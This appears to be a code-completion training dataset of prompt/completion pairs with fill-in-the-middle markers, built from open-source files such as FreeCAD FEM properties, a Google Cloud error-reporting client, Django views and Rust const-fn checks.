prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
<|file_name|>constraint_electrostaticpotential.py<|end_file_name|><|fim▁begin|># ***************************************************************************
# * Copyright (c) 2017 Markus Hovorka <m.hovorka@live.de> *
# * Copyright (c) 2020 Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This file is part of the FreeCAD CAx development system. *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
__title__ = "FreeCAD FEM constraint electrostatic potential document object"
__author__ = "Markus Hovorka, Bernd Hahnebach"
__url__ = "https://www.freecadweb.org"
## @package constraint_electrostaticpotential
# \ingroup FEM
# \brief constraint electrostatic potential object
from . import base_fempythonobject
class ConstraintElectrostaticPotential(base_fempythonobject.BaseFemPythonObject):
Type = "Fem::ConstraintElectrostaticPotential"
def __init__(self, obj):
super(ConstraintElectrostaticPotential, self).__init__(obj)
self.add_properties(obj)
def onDocumentRestored(self, obj):
self.add_properties(obj)
def add_properties(self, obj):
if not hasattr(obj, "Potential"):
obj.addProperty(
"App::PropertyFloat",
"Potential",
"Parameter",
"Potential"
),
obj.Potential = 0.0
if not hasattr(obj, "PotentialEnabled"):
obj.addProperty(
"App::PropertyBool",
"PotentialEnabled",
"Parameter",
"Potential Enabled"
),
obj.PotentialEnabled = False
if not hasattr(obj, "PotentialConstant"):
obj.addProperty(
"App::PropertyBool",
"PotentialConstant",
"Parameter",
"Potential Constant"
),
obj.PotentialConstant = False
if not hasattr(obj, "ElectricInfinity"):
obj.addProperty(
"App::PropertyBool",
"ElectricInfinity",
"Parameter",
"Electric Infinity"
),
obj.ElectricInfinity = False
if not hasattr(obj, "ElectricForcecalculation"):<|fim▁hole|> "Electric Force Calculation"
),
obj.ElectricForcecalculation = False
if not hasattr(obj, "CapacitanceBody"):
obj.addProperty(
"App::PropertyInteger",
"CapacitanceBody",
"Parameter",
"Capacitance Body"
),
obj.CapacitanceBody = 0
if not hasattr(obj, "CapacitanceBodyEnabled"):
obj.addProperty(
"App::PropertyBool",
"CapacitanceBodyEnabled",
"Parameter",
"Capacitance Body Enabled"
)
obj.CapacitanceBodyEnabled = False<|fim▁end|>
|
obj.addProperty(
"App::PropertyBool",
"ElectricForcecalculation",
"Parameter",
|
<|file_name|>client.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.errorreporting_v1beta1.types import report_errors_service
from .transports.base import ReportErrorsServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import ReportErrorsServiceGrpcTransport
from .transports.grpc_asyncio import ReportErrorsServiceGrpcAsyncIOTransport
<|fim▁hole|> """Metaclass for the ReportErrorsService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[ReportErrorsServiceTransport]]
_transport_registry["grpc"] = ReportErrorsServiceGrpcTransport
_transport_registry["grpc_asyncio"] = ReportErrorsServiceGrpcAsyncIOTransport
def get_transport_class(
cls, label: str = None,
) -> Type[ReportErrorsServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class ReportErrorsServiceClient(metaclass=ReportErrorsServiceClientMeta):
"""An API for reporting error events."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "clouderrorreporting.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ReportErrorsServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ReportErrorsServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> ReportErrorsServiceTransport:
"""Returns the transport used by the client instance.
Returns:
ReportErrorsServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Union[str, ReportErrorsServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the report errors service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ReportErrorsServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, ReportErrorsServiceTransport):
# transport is a ReportErrorsServiceTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
)
def report_error_event(
self,
request: Union[report_errors_service.ReportErrorEventRequest, dict] = None,
*,
project_name: str = None,
event: report_errors_service.ReportedErrorEvent = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> report_errors_service.ReportErrorEventResponse:
r"""Report an individual error event and record the event to a log.
This endpoint accepts **either** an OAuth token, **or** an `API
key <https://support.google.com/cloud/answer/6158862>`__ for
authentication. To use an API key, append it to the URL as the
value of a ``key`` parameter. For example:
``POST https://clouderrorreporting.googleapis.com/v1beta1/{projectName}/events:report?key=123ABC456``
**Note:** `Error Reporting </error-reporting>`__ is a global
service built on Cloud Logging and doesn't analyze logs stored
in regional log buckets or logs routed to other Google Cloud
projects.
For more information, see `Using Error Reporting with
regionalized logs </error-reporting/docs/regionalization>`__.
.. code-block:: python
from google.cloud import errorreporting_v1beta1
def sample_report_error_event():
# Create a client
client = errorreporting_v1beta1.ReportErrorsServiceClient()
# Initialize request argument(s)
event = errorreporting_v1beta1.ReportedErrorEvent()
event.message = "message_value"
request = errorreporting_v1beta1.ReportErrorEventRequest(
project_name="project_name_value",
event=event,
)
# Make the request
response = client.report_error_event(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.errorreporting_v1beta1.types.ReportErrorEventRequest, dict]):
The request object. A request for reporting an
individual error event.
project_name (str):
Required. The resource name of the Google Cloud Platform
project. Written as ``projects/{projectId}``, where
``{projectId}`` is the `Google Cloud Platform project
ID <https://support.google.com/cloud/answer/6158840>`__.
Example: // ``projects/my-project-123``.
This corresponds to the ``project_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
event (google.cloud.errorreporting_v1beta1.types.ReportedErrorEvent):
Required. The error event to be
reported.
This corresponds to the ``event`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.errorreporting_v1beta1.types.ReportErrorEventResponse:
Response for reporting an individual
error event. Data may be added to this
message in the future.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_name, event])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a report_errors_service.ReportErrorEventRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, report_errors_service.ReportErrorEventRequest):
request = report_errors_service.ReportErrorEventRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_name is not None:
request.project_name = project_name
if event is not None:
request.event = event
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.report_error_event]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("project_name", request.project_name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
"""Releases underlying transport's resources.
.. warning::
ONLY use as a context manager if the transport is NOT shared
with other clients! Exiting the with block will CLOSE the transport
and may cause errors in other clients!
"""
self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-errorreporting",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("ReportErrorsServiceClient",)<|fim▁end|>
|
class ReportErrorsServiceClientMeta(type):
|
<|file_name|>subscribers.py<|end_file_name|><|fim▁begin|>from django.shortcuts import render_to_response, get_object_or_404
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.utils.translation import ugettext as _
from apps.mainapp.models import Report, ReportSubscriber
from apps.mainapp.forms import ReportSubscriberForm
def new( request, report_id ):
report = get_object_or_404(Report, id=report_id)
error_msg = None
if request.method == 'POST':
form = ReportSubscriberForm( request.POST )
if form.is_valid():
subscriber = form.save( commit = False )
subscriber.report = report;
if report.is_subscribed(subscriber.email):
error_msg = _("You are already subscribed to this report.")
else:
subscriber.save()
return( HttpResponseRedirect( '/reports/subscribers/create/' ) )
else:
form = ReportSubscriberForm()
return render_to_response("reports/subscribers/new.html",
{ "subscriber_form": form,
"report": report,
"error_msg": error_msg, },
context_instance=RequestContext(request))
def create( request ):
return render_to_response("reports/subscribers/create.html",
{ },
context_instance=RequestContext(request))
def confirm( request, confirm_token ):<|fim▁hole|> return render_to_response("reports/subscribers/confirm.html",
{ "subscriber": subscriber, },
context_instance=RequestContext(request))
def unsubscribe(request, confirm_token ):
subscriber = get_object_or_404(ReportSubscriber, confirm_token = confirm_token )
report = subscriber.report
subscriber.delete()
return render_to_response("reports/subscribers/message.html",
{ "message": _("You have unsubscribed from updates to:") + report.title, },
context_instance=RequestContext(request))<|fim▁end|>
|
subscriber = get_object_or_404(ReportSubscriber, confirm_token = confirm_token )
subscriber.is_confirmed = True
subscriber.save()
|
<|file_name|>scheduler.component.ts<|end_file_name|><|fim▁begin|>import {Component} from '@angular/core';
import * as $ from "jquery"
import {downgradeComponent} from '@angular/upgrade/static';
import {NotificationService} from "../../core/services/notification.service";
import {AgentService} from "../../core/services/agent.service";
declare var angular:any
@Component({
selector: 'scheduler',
templateUrl: "./scheduler.component.html",
styleUrls: []
})
class SchedulerComponent {
constructor(private notification: NotificationService, private agentService: AgentService) {
// agent
// this.agentService.isActive().then(() => {
// this.init();
// });
}
init() {
}
<|fim▁hole|>}
angular.module('scheduler.components', []).directive(
`scheduler`,
downgradeComponent({component: SchedulerComponent}));
export {SchedulerComponent};<|fim▁end|>
| |
<|file_name|>qualify_min_const_fn.rs<|end_file_name|><|fim▁begin|>use rustc::hir::def_id::DefId;
use rustc::hir;
use rustc::mir::*;
use rustc::ty::{self, Predicate, TyCtxt};
use rustc_target::spec::abi;
use std::borrow::Cow;
use syntax_pos::Span;
type McfResult = Result<(), (Span, Cow<'static, str>)>;
pub fn is_min_const_fn(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
mir: &'a Mir<'tcx>,
) -> McfResult {
let mut current = def_id;
loop {
let predicates = tcx.predicates_of(current);
for (predicate, _) in &predicates.predicates {
match predicate {
| Predicate::RegionOutlives(_)
| Predicate::TypeOutlives(_)
| Predicate::WellFormed(_)
| Predicate::ConstEvaluatable(..) => continue,
| Predicate::ObjectSafe(_) => {
bug!("object safe predicate on function: {:#?}", predicate)
}
Predicate::ClosureKind(..) => {
bug!("closure kind predicate on function: {:#?}", predicate)
}
Predicate::Subtype(_) => bug!("subtype predicate on function: {:#?}", predicate),
Predicate::Projection(_) => {
let span = tcx.def_span(current);
// we'll hit a `Predicate::Trait` later which will report an error
tcx.sess
.delay_span_bug(span, "projection without trait bound");
continue;
}
Predicate::Trait(pred) => {
if Some(pred.def_id()) == tcx.lang_items().sized_trait() {
continue;
}
match pred.skip_binder().self_ty().sty {
ty::Param(ref p) => {
let generics = tcx.generics_of(current);
let def = generics.type_param(p, tcx);
let span = tcx.def_span(def.def_id);
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
));
}
// other kinds of bounds are either tautologies
// or cause errors in other passes
_ => continue,
}
}
}
}
match predicates.parent {
Some(parent) => current = parent,
None => break,
}
}
for local in mir.vars_iter() {
return Err((
mir.local_decls[local].source_info.span,
"local variables in const fn are unstable".into(),
));
}
for local in &mir.local_decls {
check_ty(tcx, local.ty, local.source_info.span)?;
}
// impl trait is gone in MIR, so check the return type manually
check_ty(
tcx,
tcx.fn_sig(def_id).output().skip_binder(),
mir.local_decls.iter().next().unwrap().source_info.span,
)?;
for bb in mir.basic_blocks() {
check_terminator(tcx, mir, bb.terminator())?;
for stmt in &bb.statements {
check_statement(tcx, mir, stmt)?;
}
}
Ok(())
}
fn check_ty(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
ty: ty::Ty<'tcx>,
span: Span,
) -> McfResult {
for ty in ty.walk() {
match ty.sty {
ty::Ref(_, _, hir::Mutability::MutMutable) => return Err((
span,
"mutable references in const fn are unstable".into(),
)),
ty::Opaque(..) => return Err((span, "`impl Trait` in const fn is unstable".into())),
ty::FnPtr(..) => {
return Err((span, "function pointers in const fn are unstable".into()))
}
ty::Dynamic(preds, _) => {
for pred in preds.iter() {
match pred.skip_binder() {
| ty::ExistentialPredicate::AutoTrait(_)
| ty::ExistentialPredicate::Projection(_) => {
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
))
}
ty::ExistentialPredicate::Trait(trait_ref) => {
if Some(trait_ref.def_id) != tcx.lang_items().sized_trait() {
return Err((
span,
"trait bounds other than `Sized` \
on const fn parameters are unstable"
.into(),
));
}
}
}
}
}
_ => {}
}
}
Ok(())
}
fn check_rvalue(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
rvalue: &Rvalue<'tcx>,
span: Span,
) -> McfResult {
match rvalue {
Rvalue::Repeat(operand, _) | Rvalue::Use(operand) => {
check_operand(tcx, mir, operand, span)
}
Rvalue::Len(place) | Rvalue::Discriminant(place) | Rvalue::Ref(_, _, place) => {
check_place(tcx, mir, place, span, PlaceMode::Read)
}
Rvalue::Cast(CastKind::Misc, operand, cast_ty) => {
use rustc::ty::cast::CastTy;
let cast_in = CastTy::from_ty(operand.ty(mir, tcx)).expect("bad input type for cast");
let cast_out = CastTy::from_ty(cast_ty).expect("bad output type for cast");
match (cast_in, cast_out) {
(CastTy::Ptr(_), CastTy::Int(_)) | (CastTy::FnPtr, CastTy::Int(_)) => Err((
span,
"casting pointers to ints is unstable in const fn".into(),
)),
(CastTy::RPtr(_), CastTy::Float) => bug!(),
(CastTy::RPtr(_), CastTy::Int(_)) => bug!(),
(CastTy::Ptr(_), CastTy::RPtr(_)) => bug!(),
_ => check_operand(tcx, mir, operand, span),
}
}
Rvalue::Cast(CastKind::UnsafeFnPointer, _, _) |
Rvalue::Cast(CastKind::ClosureFnPointer, _, _) |
Rvalue::Cast(CastKind::ReifyFnPointer, _, _) => Err((
span,
"function pointer casts are not allowed in const fn".into(),
)),
Rvalue::Cast(CastKind::Unsize, _, _) => Err((
span,
"unsizing casts are not allowed in const fn".into(),
)),
// binops are fine on integers
Rvalue::BinaryOp(_, lhs, rhs) | Rvalue::CheckedBinaryOp(_, lhs, rhs) => {
check_operand(tcx, mir, lhs, span)?;
check_operand(tcx, mir, rhs, span)?;
let ty = lhs.ty(mir, tcx);
if ty.is_integral() || ty.is_bool() || ty.is_char() {
Ok(())
} else {
Err((
span,
"only int, `bool` and `char` operations are stable in const fn".into(),
))
}
}
Rvalue::NullaryOp(NullOp::SizeOf, _) => Ok(()),
Rvalue::NullaryOp(NullOp::Box, _) => Err((
span,
"heap allocations are not allowed in const fn".into(),
)),
Rvalue::UnaryOp(_, operand) => {
let ty = operand.ty(mir, tcx);
if ty.is_integral() || ty.is_bool() {
check_operand(tcx, mir, operand, span)
} else {
Err((
span,
"only int and `bool` operations are stable in const fn".into(),
))
}
}
Rvalue::Aggregate(_, operands) => {
for operand in operands {
check_operand(tcx, mir, operand, span)?;
}
Ok(())
}
}
}
enum PlaceMode {
Assign,
Read,
}
fn check_statement(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
statement: &Statement<'tcx>,
) -> McfResult {
let span = statement.source_info.span;
match &statement.kind {
StatementKind::Assign(place, rval) => {
check_place(tcx, mir, place, span, PlaceMode::Assign)?;
check_rvalue(tcx, mir, rval, span)
}
StatementKind::FakeRead(..) => Err((span, "match in const fn is unstable".into())),
// just an assignment
StatementKind::SetDiscriminant { .. } => Ok(()),
| StatementKind::InlineAsm { .. } => {
Err((span, "cannot use inline assembly in const fn".into()))
}
// These are all NOPs
| StatementKind::StorageLive(_)
| StatementKind::StorageDead(_)
| StatementKind::Retag { .. }
| StatementKind::EscapeToRaw { .. }
| StatementKind::AscribeUserType(..)
| StatementKind::Nop => Ok(()),
}
}
fn check_operand(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
operand: &Operand<'tcx>,
span: Span,
) -> McfResult {
match operand {
Operand::Move(place) | Operand::Copy(place) => {
check_place(tcx, mir, place, span, PlaceMode::Read)
}
Operand::Constant(_) => Ok(()),
}
}
fn check_place(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
place: &Place<'tcx>,
span: Span,
mode: PlaceMode,
) -> McfResult {
match place {
Place::Local(l) => match mode {
PlaceMode::Assign => match mir.local_kind(*l) {
LocalKind::Temp | LocalKind::ReturnPointer => Ok(()),
LocalKind::Arg | LocalKind::Var => {
Err((span, "assignments in const fn are unstable".into()))
}
},
PlaceMode::Read => Ok(()),
},
// promoteds are always fine, they are essentially constants
Place::Promoted(_) => Ok(()),
Place::Static(_) => Err((span, "cannot access `static` items in const fn".into())),
Place::Projection(proj) => {
match proj.elem {
| ProjectionElem::Deref | ProjectionElem::Field(..) | ProjectionElem::Index(_) => {
check_place(tcx, mir, &proj.base, span, mode)
}
// slice patterns are unstable
| ProjectionElem::ConstantIndex { .. } | ProjectionElem::Subslice { .. } => {
return Err((span, "slice patterns in const fn are unstable".into()))
}
| ProjectionElem::Downcast(..) => {
Err((span, "`match` or `if let` in `const fn` is unstable".into()))
}
}
}
}
}
fn check_terminator(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
mir: &'a Mir<'tcx>,
terminator: &Terminator<'tcx>,
) -> McfResult {
let span = terminator.source_info.span;
match &terminator.kind {
| TerminatorKind::Goto { .. }
| TerminatorKind::Return
| TerminatorKind::Resume => Ok(()),
TerminatorKind::Drop { location, .. } => {
check_place(tcx, mir, location, span, PlaceMode::Read)
}
TerminatorKind::DropAndReplace { location, value, .. } => {
check_place(tcx, mir, location, span, PlaceMode::Read)?;
check_operand(tcx, mir, value, span)
},
TerminatorKind::FalseEdges { .. } | TerminatorKind::SwitchInt { .. } => Err((
span,
"`if`, `match`, `&&` and `||` are not stable in const fn".into(),
)),
| TerminatorKind::Abort | TerminatorKind::Unreachable => {
Err((span, "const fn with unreachable code is not stable".into()))
}
| TerminatorKind::GeneratorDrop | TerminatorKind::Yield { .. } => {
Err((span, "const fn generators are unstable".into()))
}<|fim▁hole|> TerminatorKind::Call {
func,
args,
from_hir_call: _,
destination: _,
cleanup: _,
} => {
let fn_ty = func.ty(mir, tcx);
if let ty::FnDef(def_id, _) = fn_ty.sty {
// some intrinsics are waved through if called inside the
// standard library. Users never need to call them directly
match tcx.fn_sig(def_id).abi() {
abi::Abi::RustIntrinsic => match &tcx.item_name(def_id).as_str()[..] {
| "size_of"
| "min_align_of"
| "needs_drop"
=> {},
_ => return Err((
span,
"can only call a curated list of intrinsics in `min_const_fn`".into(),
)),
},
abi::Abi::Rust if tcx.is_min_const_fn(def_id) => {},
abi::Abi::Rust => return Err((
span,
"can only call other `min_const_fn` within a `min_const_fn`".into(),
)),
abi => return Err((
span,
format!(
"cannot call functions with `{}` abi in `min_const_fn`",
abi,
).into(),
)),
}
check_operand(tcx, mir, func, span)?;
for arg in args {
check_operand(tcx, mir, arg, span)?;
}
Ok(())
} else {
Err((span, "can only call other const fns within const fn".into()))
}
}
TerminatorKind::Assert {
cond,
expected: _,
msg: _,
target: _,
cleanup: _,
} => check_operand(tcx, mir, cond, span),
TerminatorKind::FalseUnwind { .. } => {
Err((span, "loops are not allowed in const fn".into()))
},
}
}<|fim▁end|>
| |
<|file_name|>building_location_choice_model.py<|end_file_name|><|fim▁begin|># Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
from urbansim.models.building_location_choice_model import BuildingLocationChoiceModel as UrbansimBuildingLocationChoiceModel
from numpy import where, arange, zeros
from numpy import logical_or, logical_not
from opus_core.variables.variable_name import VariableName
from opus_core.resources import Resources
